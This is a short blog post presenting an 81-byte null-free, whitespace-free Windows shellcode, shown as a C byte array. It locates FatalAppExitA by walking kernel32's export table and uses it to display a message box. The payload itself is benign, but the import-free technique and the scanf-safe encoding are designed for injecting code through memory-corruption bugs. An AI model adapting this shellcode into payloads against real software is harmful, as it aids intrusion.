Message box 81 bytes shellcode

As it is my first blog post, I thought about what to add and then I was working on writing a small shellcode, so I said why not post it!
Here is a small shellcode of 81 bytes that displays a message box without importing USER32.DLL. It uses FatalAppExitA API which will display a message and terminates the program.

 Thanks to Berend-Jan Wever & Peter Ferrie for their compact shellcode that execute the calculator which this shellcode is based on. Thanks to Giuseppe D’Amore for inspiration.

It worth to mention that the shellcode is null free, fscanf/scanf/sscanf safe, i.e. white-space characters free (0x09, 0x0A, 0x0B, 0x0C, 0x0D and 0x20).

 unsigned char shellcode[81] = {  
   0x33, 0xD2, 0x52, 0x68, 0x4D, 0x30, 0x53, 0x41, 0x54, 0x52, 0xB2, 0x30,  
   0x64, 0x8B, 0x32, 0xC1, 0xEA, 0x02, 0x8B, 0x34, 0x32, 0x8B, 0x34, 0x32,  
   0xAD, 0x8B, 0x30, 0x8B, 0x7E, 0x18, 0x8B, 0x5F, 0x3C, 0x8B, 0x5C, 0x3B,  
   0x78, 0x83, 0xC2, 0x14, 0x03, 0xD3, 0x8B, 0x34, 0x3A, 0x03, 0xF7, 0x8B,  
   0x4C, 0x3B, 0x24, 0x03, 0xCF, 0x33, 0xD2, 0x0F, 0xB7, 0x2C, 0x51, 0x42,  
   0xAD, 0x81, 0x3C, 0x38, 0x46, 0x61, 0x74, 0x61, 0x75, 0xF1, 0x8B, 0x74,  
   0x3B, 0x1C, 0x03, 0xF7, 0x03, 0x3C, 0xAE, 0xFF, 0xD7  
 };  

Assembly code can be downloaded from here

Leave a Reply

Your email address will not be published. Required fields are marked *